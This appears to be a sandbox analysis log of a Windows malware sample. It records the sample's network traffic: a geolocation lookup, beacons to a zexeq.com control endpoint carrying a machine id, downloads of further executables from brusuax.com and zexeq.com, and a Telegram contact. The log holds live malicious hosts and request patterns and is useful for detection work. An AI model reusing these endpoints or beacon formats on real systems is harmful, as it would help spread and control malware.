                                                                                                                                                                      Jan 12, 2024 06:48:16.040821075 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040849924 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040965080 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040987968 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041023016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041023016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041105986 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041224003 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041277885 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041301012 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041327000 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041356087 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041435957 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041454077 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041507006 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041601896 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041651011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041755915 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041779041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.166292906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.166913986 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.355356932 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.355381966 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.355456114 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.355690956 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.356101036 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.544591904 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.544941902 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.545598030 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.545598030 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.548032045 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.548032045 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.736402988 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.778825998 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.024849892 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.025185108 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.050591946 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.052402020 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.090867043 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.241223097 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.242306948 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.242388010 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.242579937 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.242831945 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.247828960 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.402314901 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.402394056 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.402801037 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.431035995 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.431653976 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.431725025 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.432001114 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.434159040 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.549952030 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.551659107 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.551820993 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.622961998 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.712251902 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.712452888 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.712532997 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.855025053 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.855233908 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.855233908 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.911195993 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.911501884 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.022156000 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.101753950 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.102283001 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.157852888 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.291779041 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.291804075 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.292144060 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.292144060 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.292669058 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.481400013 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.481829882 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.482140064 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.482558012 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.484266043 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.675662041 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.961793900 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.962049961 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.069261074 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.069783926 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.259042025 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.259418964 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.259660006 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.260020971 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.260109901 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.448158979 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.448353052 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.448429108 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.448982000 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.451313972 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.453960896 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.642417908 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.642568111 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.646008968 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.646090031 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.647320986 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.822832108 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.822911978 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.823147058 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.833340883 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.833358049 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.835900068 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.836357117 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.836442947 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.836705923 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.838455915 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.841341972 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.026740074 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.027556896 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.029644966 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.029745102 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.042965889 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.043087006 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.058397055 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.077491045 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.077526093 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.078466892 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.079564095 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.088953972 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.133940935 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247627020 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247797012 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247896910 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.248128891 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.249922991 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.251782894 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.439261913 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.439332962 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.441093922 CET1022049764116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.441174984 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.441637039 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.529284000 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.529366970 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      • api.2ip.ua
                                                                                                                                                                      • t.me
                                                                                                                                                                      • zexeq.com
                                                                                                                                                                      • brusuax.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 175.120.254.9 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:00.969908953 CET | 137 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 175.120.254.9 | 80 | 7596 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:00.971760035 CET | 126 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 186.147.159.149 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:01.179519892 CET | 91 | OUT | GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: brusuax.com
Jan 12, 2024 06:48:01.900572062 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 12 Jan 2024 05:48:01 GMT
Content-Type: application/octet-stream
Content-Length: 367104
Last-Modified: Wed, 10 Jan 2024 12:50:02 GMT
Connection: close
ETag: "659e927a-59a00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 175.120.254.9 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:04.269814014 CET | 94 | OUT | GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 175.120.254.9 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:06.586731911 CET | 137 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 175.120.254.9 | 80 | 7596 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:06.593430042 CET | 126 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 175.120.254.9 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:12.744860888 CET | 137 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 175.120.254.9 | 80 | 7596 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:12.962877035 CET | 126 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49757 | 175.120.254.9 | 80 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:18.402801037 CET | 137 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49758 | 175.120.254.9 | 80 | 7596 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 06:48:18.551820993 CET | 126 | OUT | GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 172.67.139.220 | 443 | 7496 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-12 05:47:55 UTC | 85 | OUT | GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
2024-01-12 05:47:55 UTC | 887 | IN | HTTP/1.1 200 OK
Date: Fri, 12 Jan 2024 05:47:55 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pW4vFvfVXn93nV5ceriJdXEobEXNdFbqL4G62%2BBgUeaYWBlWOKe24w62GyAM8yJyK9SNfxFwXkk%2BhjT9Ur7Qs9fQ01jriNmtuGr2A0SSqELjJt7mZdGmATAb7Soi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 84431b851ec50817-IAD
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:55 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                      1 | 192.168.2.4 | 49730 | 172.67.139.220 | 443 | 7608 | C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                      2024-01-12 05:47:56 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 891 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:47:57 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4sL666jJxAh3LnzXDm1cw7Zlbfx8iIioBqlHWZvPPuFjXmu%2FCCr1GTeJxH13Vk5Ti6MtSGBi2dqpBeJW%2FCWhavLTU3ul8htCzkVmZjCys%2FqJVqSjipDaOjW4oaj%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431b9129d70802-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                      2 | 192.168.2.4 | 49731 | 172.67.139.220 | 443 | 7596 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 887 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:47:57 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4E43GG0xu4HutJT5gLwjjykOAk14vXqf%2F7z73dlTKjl%2Fdt67nk4u8cXlo3YtKirwwAgALyeDEK8HjphHhbzpQuH2kGn5ck2UDJjAwjoyxUSXTS5N3Fk97sEkkoL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431b92aeae2093-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                      3 | 192.168.2.4 | 49736 | 149.154.167.99 | 443 | 7772 | C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                      2024-01-12 05:48:04 UTC | 86 | OUT | GET /bg3goty HTTP/1.1
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-01-12 05:48:05 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:05 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 12339
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: stel_ssid=2f1c8a115f301e78ef_2296380738082918008; expires=Sat, 13 Jan 2024 05:48:05 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                      2024-01-12 05:48:05 UTC | 12339 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @bg3goty</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                      4 | 192.168.2.4 | 49745 | 172.67.139.220 | 443 | 7872 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                      2024-01-12 05:48:12 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:48:13 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:13 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
